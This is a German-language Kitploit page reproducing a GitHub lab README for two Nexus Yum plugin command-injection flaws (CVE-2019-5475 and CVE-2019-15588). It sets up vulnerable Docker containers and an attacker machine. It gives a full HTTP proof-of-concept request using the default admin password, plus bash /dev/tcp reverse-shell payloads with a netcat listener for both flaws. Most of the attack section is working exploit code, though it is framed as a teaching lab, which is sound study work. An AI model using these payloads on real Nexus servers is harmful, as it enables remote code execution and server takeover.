Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-5475 — CVE-2019-5475 Lab: RCE-Befehlsinjektionsschwachstelle | Kitploit
Tools/GitHubGitHub/exp-docs/cve-2019-5475
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubexp-docs/cve-2019-5475

CVE-2019-5475

CVE-2019-5475 Lab: RCE-Befehlsinjektionsschwachstelle

Repository anzeigen
531vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2019-5475

CVE-2019-5475 und CVE-2019-15588 Lab: RCE-Befehlsinjektions-Schwachstelle


0x00 Hintergrund

CVE-2019-5475 ist eine RCE-Befehlsinjektions-Schwachstelle im integrierten Plugin Yum Repository von Nexus, die erstmals auf hackerone veröffentlicht wurde. Da die erste offizielle Korrektur unvollständig war, entstand daraus die Schwachstelle CVE-2019-15588.

Beide Schwachstellen können nur nach einem Login als Administrator ausgenutzt werden. Das Standard-Admin-Passwort admin123 von Nexus wird jedoch häufig nicht geändert, sodass die Schwachstellen leicht ausgenutzt werden können.

0x10 Laborumgebung

0x20 Verzeichnisstruktur

root@kitploit:~
CVE-2019-5475
├── nexus-yum-core .......... [Maven-Projekt zum Debuggen: simuliert die Eingabe von createrepo oder mergerepo in der Nexus-GUI]
├── nexus ................... [Daten-Mount-Verzeichnis des Nexus-Containers]
├── attacker ................ [Build-Verzeichnis der Angreifer-Maschine]
│   └── Dockerfile .......... [Docker-Build-Datei der Angreifer-Maschine]
├── docker-compose.yml ...... [Docker-Build-Konfiguration]
├── imgs .................... [Bilder zur Unterstützung der README-Erklärung]
└── README.md ............... [Diese README-Erklärung]
Tool herunterladen

0x40 Aufbau des Labors

  • Auf dem Host müssen Docker und Docker-Compose vorinstalliert sein
  • Dieses Repository herunterladen: git clone https://github.com/lyy289065406/CVE-2019-5475
  • Nexus-Build-Verzeichnis öffnen: cd CVE-2019-5475
  • Nexus erstellen und ausführen: docker-compose up -d
  • Nach ca. 5 Minuten kann Nexus über den Browser aufgerufen werden (BasicAuth ist admin/admin123), wobei gilt:
NexusCVEURL
2.14.9CVE-2019-5475http://127.0.0.1:8009/nexus
2.14.14CVE-2019-15588http://127.0.0.1:8014/nexus

Dieses Labor umfasst außerdem eine Angreifer-Maschine 172.168.50.2, die sich im selben Netzwerk wie die beiden Zielmaschinen befindet und zur Validierung der Reverse Shell dient

0x50 【CVE-2019-5475】Validierung im Labor

0x51 PoC

Mit admin bei http://127.0.0.1:8009/nexus/#capabilities anmelden. Unter Administration -> Capabilities -> Yum: Configuration -> Settings findet sich der RCE-Injektionspunkt.

Die Eingabefelder Path of "createrepo" und Path of "mergerepo" können beide injiziert werden. Das Ausführungsergebnis kann unter Status eingesehen werden.

Zum Beispiel kann am Injektionspunkt createrepo der PoC bash -c id || python konstruiert werden. Unter Status erhält man dann das Ausführungsergebnis uid=200(nexus) gid=200(nexus) groups=200(nexus) des Befehls bash -c id.

Über BurpSuite kann die entsprechende PoC-Anfrage abgefangen werden:

root@kitploit:~
PUT /nexus/service/siesta/capabilities/RANDOM_ID HTTP/1.1
Host: 127.0.0.1:8009
accept: application/json
Content-Type: application/json
Authorization: Basic YWRtaW46YWRtaW4xMjM=
Connection: close

{"typeId":"yum","enabled":true,"properties":[{"key":"createrepoPath","value":"bash -c id || python"}],"id":"RANDOM_ID"}

0x52 EXP

Dieser Injektionspunkt lässt sich leicht zum Aufbau einer Reverse Shell ausnutzen:

  • Auf der Angreifer-Maschine anmelden: docker exec -it -u root docker_attacker /bin/bash
  • Reverse Shell mit netcat abhören: nc -lvvp 4444
  • Am oben genannten Injektionspunkt createrepo folgenden Payload konstruieren: bash -c $@|bash 0 echo bash -i >&/dev/tcp/172.168.50.2/4444 0>&1 || python

0x60 【CVE-2019-15588】Validierung im Labor

0x61 PoC

Die Injektionsstelle ist dieselbe wie bei CVE-2019-5475. Den PoC wie folgt anpassen: /bin/bash -c id || /createrepo

0x62 EXP

Diese Schwachstelle kann mit derselben Methode für eine Reverse Shell ausgenutzt werden:

  • Auf der Angreifer-Maschine anmelden: docker exec -it -u root docker_attacker /bin/bash
  • Reverse Shell mit netcat abhören: nc -lvvp 4444
  • Am Injektionspunkt createrepo folgenden Payload konstruieren: /bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/172.168.50.2/4444 0>&1 || /createrepo

0x70 Behebung der Schwachstellen

  • Für CVE-2019-5475: Erster offizieller Korrektur-Patch
  • Für CVE-2019-15588: Zweiter offizieller Korrektur-Patch

0x80 Über nexus-yum-core

nexus-yum-core ist der Kerncode-Ausschnitt von Nexus, der für diese Schwachstellenausnutzung relevant ist. Er dient hauptsächlich dazu, den eingegebenen Payload direkt vom Backend aus zu debuggen und zu analysieren, ohne den vollständigen Nexus-Dienst aus dem Quellcode aufbauen zu müssen.

0x90 Referenzen

  • https://paper.seebug.org/1260/
  • https://blog.spoock.com/2018/11/25/getshell-bypass-exec/